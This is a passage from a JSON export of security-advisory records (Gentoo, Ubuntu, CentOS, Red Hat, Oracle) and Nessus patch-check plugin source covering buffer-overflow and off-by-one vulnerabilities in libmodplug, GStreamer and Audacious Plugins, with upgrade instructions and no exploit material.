"AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:18", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "### Background\n\nPlugins for the Audacious music player.\n\n### Description\n\nMultiple vulnerabilities have been found in Audacious Plugins:\n\n * The \"CSoundFile::ReadWav()\" function in load_wav.cpp contains an integer overflow which could cause a heap-based buffer overflow (CVE-2011-2911). \n * The \"CSoundFile::ReadS3M()\" function in load_s3m.cpp contains multiple boundary errors which could cause a stack-based buffer overflow (CVE-2011-2912). \n * The \"CSoundFile::ReadAMS()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2913). \n * The \"CSoundFile::ReadDSM()\" function in load_dms.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2914). \n * The \"CSoundFile::ReadAMS2()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2915). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file, possibly resulting in execution of arbitrary code, or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Audacious Plugins users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=media-plugins/audacious-plugins-3.1\"", "edition": 1, "modified": "2012-03-16T00:00:00", "published": "2012-03-16T00:00:00", "id": "GLSA-201203-14", "href": "https://security.gentoo.org/glsa/201203-14", "type": "gentoo", "title": "Audacious Plugins: User-assisted execution of arbitrary code", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:34:03", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Hossein Lotfi discovered that libmodplug did not correctly handle certain \nmalformed media files. If a user or automated system were tricked into \nopening a crafted media file, an attacker could cause a denial of service \nor possibly execute arbitrary code with privileges of the user invoking the \nprogram. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\n\nIt was discovered that libmodplug did not correctly handle certain \nmalformed media files. If a user or automated system were tricked into \nopening a crafted media file, an attacker could cause a denial of service \nor possibly execute arbitrary code with privileges of the user invoking the \nprogram. (CVE-2011-2914, CVE-2011-2915)", "edition": 5, "modified": "2011-11-09T00:00:00", "published": "2011-11-09T00:00:00", "id": "USN-1255-1", "href": "https://ubuntu.com/security/notices/USN-1255-1", "title": "libmodplug vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-09T00:31:22", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2011-1761"], "description": "It was discovered that libmodplug did not correctly handle certain \nmalformed S3M media files. If a user or automated system were tricked into \nopening a crafted S3M file, an attacker could cause a denial of service or \npossibly execute arbitrary code with privileges of the user invoking the \nprogram. (CVE-2011-1574)\n\nIt was discovered that libmodplug did not correctly handle certain \nmalformed ABC media files. If a user or automated system were tricked into \nopening a crafted ABC file, an attacker could cause a denial of service or \npossibly execute arbitrary code with privileges of the user invoking the \nprogram. (CVE-2011-1761)\n\nThe default compiler options for affected releases should reduce the \nvulnerability to a denial of service.", "edition": 5, "modified": "2011-06-13T00:00:00", "published": "2011-06-13T00:00:00", "id": "USN-1148-1", "href": "https://ubuntu.com/security/notices/USN-1148-1", "title": "libmodplug vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:39", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "**CentOS Errata and Security Advisory** CESA-2011:1264\n\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one flaws\nwere found in various ModPlug music file format library (libmodplug)\nmodules, embedded in GStreamer. An attacker could create specially-crafted\nmusic files that, when played by a victim, would cause applications using\nGStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\nCVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-September/029757.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-September/029758.html\n\n**Affected packages:**\ngstreamer-plugins\ngstreamer-plugins-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1264.html", "edition": 4, "modified": "2011-09-08T17:33:42", "published": "2011-09-08T17:33:02", "href": "http://lists.centos.org/pipermail/centos-announce/2011-September/029757.html", "id": "CESA-2011:1264", "title": "gstreamer security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:28:03", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2006-4192"], "description": "**CentOS Errata and Security Advisory** CESA-2011:0477\n\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, and a\nstack-based buffer overflow flaw were found in various ModPlug music file\nformat library (libmodplug) modules, embedded in GStreamer. An attacker\ncould create specially-crafted music files that, when played by a victim,\nwould cause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2006-4192, CVE-2011-1574)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-May/029510.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-May/029511.html\n\n**Affected packages:**\ngstreamer-plugins\ngstreamer-plugins-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-0477.html", "edition": 4, "modified": "2011-05-04T12:22:21", "published": "2011-05-04T12:22:21", "href": "http://lists.centos.org/pipermail/centos-announce/2011-May/029510.html", "id": "CESA-2011:0477", "title": "gstreamer security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:45", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2914", "CVE-2011-2915"], "description": "The gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one flaws\nwere found in various ModPlug music file format library (libmodplug)\nmodules, embedded in GStreamer. An attacker could create specially-crafted\nmusic files that, when played by a victim, would cause applications using\nGStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\nCVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n", "modified": "2017-09-08T12:18:44", "published": "2011-09-06T04:00:00", "id": "RHSA-2011:1264", "href": "https://access.redhat.com/errata/RHSA-2011:1264", "type": "redhat", "title": "(RHSA-2011:1264) Important: gstreamer-plugins security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:04", "bulletinFamily": "unix", "cvelist": ["CVE-2006-4192", "CVE-2011-1574"], "description": "The gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, and a\nstack-based buffer overflow flaw were found in various ModPlug music file\nformat library (libmodplug) modules, embedded in GStreamer. An attacker\ncould create specially-crafted music files that, when played by a victim,\nwould cause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2006-4192, CVE-2011-1574)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n", "modified": "2017-09-08T11:55:05", "published": "2011-05-02T04:00:00", "id": "RHSA-2011:0477", "href": "https://access.redhat.com/errata/RHSA-2011:0477", "type": "redhat", "title": "(RHSA-2011:0477) Important: gstreamer-plugins security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "[0.8.5-1.0.1.EL.4]\n- Update release to address ULN up2date\n[0.8.5-1.EL.4]\n- Add patches for CVE-2011-2911, CVE-2011-2912, CVE-2011-2913, CVE-2011-2914\n and CVE-2011-2915\nRelated: rhbz #730997", "edition": 4, "modified": "2011-09-07T00:00:00", "published": "2011-09-07T00:00:00", "id": "ELSA-2011-1264", "href": "http://linux.oracle.com/errata/ELSA-2011-1264.html", "title": "gstreamer-plugins security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:16", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2006-4192"], "description": "[0.8.5-1.0.1.EL.3]\n- Update release to address ULN up2date\n[0.8.5-1.EL.3]\n- Add patches for CVE-2006-4192 and CVE-2011-1574\nRelated: rhbz #696507", "edition": 4, "modified": "2011-05-02T00:00:00", "published": "2011-05-02T00:00:00", "id": "ELSA-2011-0477", "href": "http://linux.oracle.com/errata/ELSA-2011-0477.html", "title": "gstreamer-plugins security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1255-1\r\nNovember 09, 2011\r\n\r\nlibmodplug vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nlibmodplug could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- libmodplug: Library for mod music based on ModPlug\r\n\r\nDetails:\r\n\r\nHossein Lotfi discovered that libmodplug did not correctly handle certain\r\nmalformed media files. If a user or automated system were tricked into\r\nopening a crafted media file, an attacker could cause a denial of service\r\nor possibly execute arbitrary code with privileges of the user invoking the\r\nprogram. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\r\n\r\nIt was discovered that libmodplug did not correctly handle certain\r\nmalformed media files. If a user or automated system were tricked into\r\nopening a crafted media file, an attacker could cause a denial of service\r\nor possibly execute arbitrary code with privileges of the user invoking the\r\nprogram. (CVE-2011-2914, CVE-2011-2915)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n libmodplug1 1:0.8.8.2-3ubuntu1.1\r\n\r\nUbuntu 11.04:\r\n libmodplug1 1:0.8.8.1-2ubuntu0.3\r\n\r\nUbuntu 10.10:\r\n libmodplug1 1:0.8.8.1-1ubuntu1.3\r\n\r\nUbuntu 10.04 LTS:\r\n libmodplug0c2 1:0.8.7-1ubuntu0.3\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1255-1\r\n CVE-2011-2911, CVE-2011-2912, CVE-2011-2913, CVE-2011-2914,\r\n CVE-2011-2915\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.8.2-3ubuntu1.1\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.8.1-2ubuntu0.3\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.8.1-1ubuntu1.3\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.7-1ubuntu0.3\r\n", "edition": 1, "modified": "2011-11-11T00:00:00", "published": "2011-11-11T00:00:00", "id": "SECURITYVULNS:DOC:27284", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27284", "title": "[USN-1255-1] libmodplug vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Memory corruptions on different media formats.", "edition": 1, "modified": "2011-11-11T00:00:00", "published": "2011-11-11T00:00:00", "id": "SECURITYVULNS:VULN:12028", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12028", "title": "libmodplug library multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1574", "CVE-2011-1761"], "description": "ReadS3M buffer overflow. DoS on ABC files parsing.", "edition": 1, "modified": "2011-04-11T00:00:00", "published": "2011-04-11T00:00:00", "id": "SECURITYVULNS:VULN:11574", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11574", "title": "libmodplug library buffer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T06:36:58", "description": "Hossein Lotfi discovered that libmodplug did not correctly handle\ncertain malformed media files. If a user or automated system were\ntricked into opening a crafted media file, an attacker could cause a\ndenial of service or possibly execute arbitrary code with privileges\nof the user invoking the program. (CVE-2011-2911, CVE-2011-2912,\nCVE-2011-2913)\n\nIt was discovered that libmodplug did not correctly handle certain\nmalformed media files. If a user or automated system were tricked into\nopening a crafted media file, an attacker could cause a denial of\nservice or possibly execute arbitrary code with privileges of the user\ninvoking the program. (CVE-2011-2914, CVE-2011-2915).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2011-11-10T00:00:00", "title": "Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : libmodplug vulnerabilities (USN-1255-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libmodplug0c2", "p-cpe:/a:canonical:ubuntu_linux:libmodplug1", "cpe:/o:canonical:ubuntu_linux:10.10"], "id": "UBUNTU_USN-1255-1.NASL", "href": "https://www.tenable.com/plugins/nessus/56767", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1255-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56767);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"USN\", value:\"1255-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : libmodplug vulnerabilities (USN-1255-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hossein Lotfi discovered that libmodplug did not correctly handle\ncertain malformed media files. If a user or automated system were\ntricked into opening a crafted media file, an attacker could cause a\ndenial of service or possibly execute arbitrary code with privileges\nof the user invoking the program. (CVE-2011-2911, CVE-2011-2912,\nCVE-2011-2913)\n\nIt was discovered that libmodplug did not correctly handle certain\nmalformed media files. If a user or automated system were tricked into\nopening a crafted media file, an attacker could cause a denial of\nservice or possibly execute arbitrary code with privileges of the user\ninvoking the program. (CVE-2011-2914, CVE-2011-2915).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1255-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug0c2 and / or libmodplug1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmodplug0c2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmodplug1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libmodplug0c2\", pkgver:\"1:0.8.7-1ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libmodplug1\", pkgver:\"1:0.8.8.1-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"libmodplug1\", pkgver:\"1:0.8.8.1-2ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"libmodplug1\", pkgver:\"1:0.8.8.2-3ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug0c2 / libmodplug1\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:53:31", "description": "The remote host is affected by the vulnerability described in GLSA-201203-14\n(Audacious Plugins: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been found in Audacious Plugins:\n The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an\n integer overflow which could cause a heap-based buffer overflow\n (CVE-2011-2911).\n The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains\n multiple boundary errors which could cause a stack-based buffer\n overflow (CVE-2011-2912).\n The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2913).\n The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2914).\n The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2915).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file, possibly resulting in execution of arbitrary code, or a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 22, "published": "2012-03-19T00:00:00", "title": "GLSA-201203-14 : Audacious Plugins: User-assisted execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2012-03-19T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:audacious-plugins"], "id": "GENTOO_GLSA-201203-14.NASL", "href": "https://www.tenable.com/plugins/nessus/58379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201203-14.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58379);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"GLSA\", value:\"201203-14\");\n\n script_name(english:\"GLSA-201203-14 : Audacious Plugins: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201203-14\n(Audacious Plugins: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been found in Audacious Plugins:\n The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an\n integer overflow which could cause a heap-based buffer overflow\n (CVE-2011-2911).\n The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains\n multiple boundary errors which could cause a stack-based buffer\n overflow (CVE-2011-2912).\n The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2913).\n The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2914).\n The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2915).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file, possibly resulting in execution of arbitrary code, or a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201203-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Audacious Plugins users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=media-plugins/audacious-plugins-3.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:audacious-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-plugins/audacious-plugins\", unaffected:make_list(\"ge 3.1\"), vulnerable:make_list(\"lt 3.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Audacious Plugins\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:10", "description": "Patch to use the system's libmodplug library.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2011-09-19T00:00:00", "title": "Fedora 14 : audacious-plugins-2.4.5-4.fc14 (2011-12370)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-09-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:audacious-plugins", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-12370.NASL", "href": "https://www.tenable.com/plugins/nessus/56224", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-12370.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56224);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name:\"FEDORA\", value:\"2011-12370\");\n\n script_name(english:\"Fedora 14 : audacious-plugins-2.4.5-4.fc14 (2011-12370)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", 